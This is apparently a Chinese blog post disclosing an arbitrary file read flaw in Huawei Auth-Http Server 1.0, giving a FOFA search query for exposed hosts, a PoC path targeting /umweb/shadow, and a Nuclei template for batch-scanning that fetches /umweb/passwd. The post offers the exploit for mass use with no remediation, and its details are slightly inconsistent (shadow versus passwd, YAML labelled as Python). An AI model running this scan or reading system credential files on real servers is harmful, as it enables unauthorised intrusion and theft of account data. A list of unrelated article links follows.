华为Auth-Http Serve任意文件读取

1.漏洞描述

华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。

2.网络资产查找

FOFA:server="Huawei Auth-Http Server 1.0"

2、部分界面如下

3、Poc

/umweb/shadow

4、Poc批量验证

python 复制代码
id: huanwei-auth-http-server-fileread

info:
name: 华为Auth-Http Server 1.0任意文件读取
author:
severity: medium
description: 华为Auth-Http Server 1.0任意文件读取,攻击者可通过此漏洞获取敏感信息。

reference:
- https://
metadata:
fofa-query: server="Huawei Auth-Http Server 1.0"
verified: true
max-request: 1

http:
- raw:
- |
GET /umweb/passwd HTTP/1.1
Host: {{Hostname}}


matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"root")'
相关推荐
worthsen14 分钟前
Linux 服务管理 service systemd systemctl
linux·运维
巴拉特好队友1 小时前
找到一个linux静态库动态库的好资料.3
linux·运维·服务器
一位资深码农2 小时前
关于Nginx
运维·nginx
hgdlip2 小时前
b站ip属地评论和主页不一样怎么回事
服务器·网络·tcp/ip
Hacker_Fuchen2 小时前
linux 中 Vi 和 Vim 的使用
linux·运维·vim
努力的小T2 小时前
Debian操作系统相对于Ubuntu有什么优势吗?
linux·运维·服务器·ubuntu·centos·云计算·debian
毒丐2 小时前
Debian系软件管理工具命令大全
linux·运维·debian
MXsoft6183 小时前
智能运维赋能江苏汽车制造
服务器·网络·数据库
偏执网友3 小时前
sqlserver镜像设置
服务器·数据库·sqlserver·镜像
姜豆豆耶3 小时前
kettle经验篇:Pentaho Repository 类型资源库卡顿问题
linux·运维·华为云·etl